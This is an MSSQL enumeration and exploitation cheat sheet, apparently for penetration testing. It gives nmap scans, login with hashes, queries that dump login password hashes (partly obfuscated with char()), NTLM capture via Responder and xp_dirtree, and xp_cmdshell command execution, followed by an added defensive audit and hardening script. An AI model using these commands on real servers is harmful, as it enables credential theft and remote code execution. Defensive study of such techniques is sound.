MSSQL enumeration and exploitation

Initial enumeration

nmap -vv -p 1433 -sT --script=+ms-sql* <ip>

Connecting to an MSSQL database

  • Connect to a database using mssql-cli:
mssql-cli -U <username> -P '<password>' -d <database> -S "tcp:<ip>,1433"
mssql-cli -U <username> -P '<password>' -d <database> -S "tcp:<ip>,1433" -E # Windows auth
  • Or connect using mssqlclient.py:
mssqlclient.py -db <database> <user>:'<password>'@<ip>
mssqlclient.py -db <database> -windows-auth <user>:'<password>'@<ip> # Windows auth
mssqlclient.py -db <database> -hashes LMHASH:NTHASH <user>@<ip> -windows-auth # Using hashes instead of a password

Enumerating a database

  • Get version:
SELECT @@version; 
  • Get current database:
SELECT db_name(); 
  • List non-default databases:
SELECT name FROM master.sys.databases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb'); 
  • Get current user:
SELECT original_login();
  • List user permissions:
SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 
  • Get the current login's password hash (the output format matches hashcat mode 1731):
SELECT convert(varchar(MAX),(loginproperty(original_login(),(char(080)+char(097)+char(115)+char(115)+char(119)+char(111)+char(114)+char(100)+char(072)+char(097)+char(115)+char(104))) ),1);
  • List all users:
SELECT name FROM sys.syslogins ORDER BY 1;
  • Get the sa login's password hash (the output format matches hashcat mode 1731):
SELECT convert(varchar(MAX),(loginproperty((char(115)+char(97)),(char(080)+char(097)+char(115)+char(115)+char(119)+char(111)+char(114)+char(100)+char(072)+char(097)+char(115)+char(104))) ),1);
  • List tables:
SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 
  • List table columns:
SELECT column_name FROM information_schema.columns WHERE table_name='<table_name>' ORDER BY 1;  
  • Search for tables whose name contains "user" (a %user% LIKE pattern, built with char() here):
SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE char(37)+char(117)+char(115)+char(101)+char(114)+char(37) ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; -- OFFSET/FETCH paging (the LIMIT/OFFSET equivalent) requires SQL Server 2012 or later

Getting NTLM hashes

  • Listen for incoming SMB connections on your machine:
sudo responder -I tun0
  • Make the SQL server send an authenticated SMB request to that listener via SQL:
EXEC xp_dirtree '\\<ip>\test';

Executing system commands

  • Enable xp_cmdshell (only works if the login has privileges to change server configuration):
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
  • Run commands:
EXEC xp_cmdshell '<command>';
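The defender's counterpart to the sections above, added here and not part of the original cheat sheet: a T-SQL audit that checks the settings and permissions those queries depend on (xp_cmdshell state, who can flip it, who can call xp_dirtree, whether sa is enabled), looks for the error-log trace a reconfiguration leaves, and reverts xp_cmdshell. It assumes it is run as sysadmin (or a login holding VIEW ANY DEFINITION and ALTER SETTINGS); the hardening statements at the end are optional and commented accordingly.

```sql
-- Added audit/hardening script; not from the original cheat sheet.
-- Assumption: executed in master as sysadmin (or with VIEW ANY DEFINITION + ALTER SETTINGS).
USE master;

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means EXEC xp_cmdshell works right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures');

-- 2. Who can enable it? sp_configure needs ALTER SETTINGS; CONTROL SERVER covers that
--    and is also what reading another login's hash via LOGINPROPERTY relies on.
SELECT sp.name AS login_name, sp.type_desc, perm.permission_name, perm.state_desc
FROM sys.server_principals sp
JOIN sys.server_permissions perm ON perm.grantee_principal_id = sp.principal_id
WHERE perm.permission_name IN ('ALTER SETTINGS', 'CONTROL SERVER')
  AND sp.name NOT LIKE '##%';

--    sysadmin and serveradmin members get ALTER SETTINGS implicitly.
SELECT r.name AS server_role, m.name AS member, m.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'serveradmin');

-- 3. Who can call xp_dirtree (the UNC-path NTLM trick)? It is granted to public by default.
SELECT dp.name AS grantee, p.permission_name, p.state_desc
FROM sys.database_permissions p
JOIN sys.database_principals dp ON dp.principal_id = p.grantee_principal_id
WHERE p.major_id = OBJECT_ID('master.dbo.xp_dirtree');

-- 4. Is the built-in sa login (principal_id 1) still enabled? The hash queries target it by name.
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM sys.sql_logins
WHERE principal_id = 1;

-- 5. Detection: enabling xp_cmdshell writes a "Configuration option 'xp_cmdshell' changed"
--    line to the current SQL Server error log (log 0, type 1 = SQL Server log).
EXEC xp_readerrorlog 0, 1, N'xp_cmdshell';

-- 6. Hardening (uncomment deliberately): turn xp_cmdshell off, re-hide advanced options,
--    take xp_dirtree away from public and disable sa.
-- EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
-- EXEC sp_configure 'show advanced options', 0;  RECONFIGURE;
-- REVOKE EXECUTE ON dbo.xp_dirtree FROM public;
-- ALTER LOGIN sa DISABLE;
```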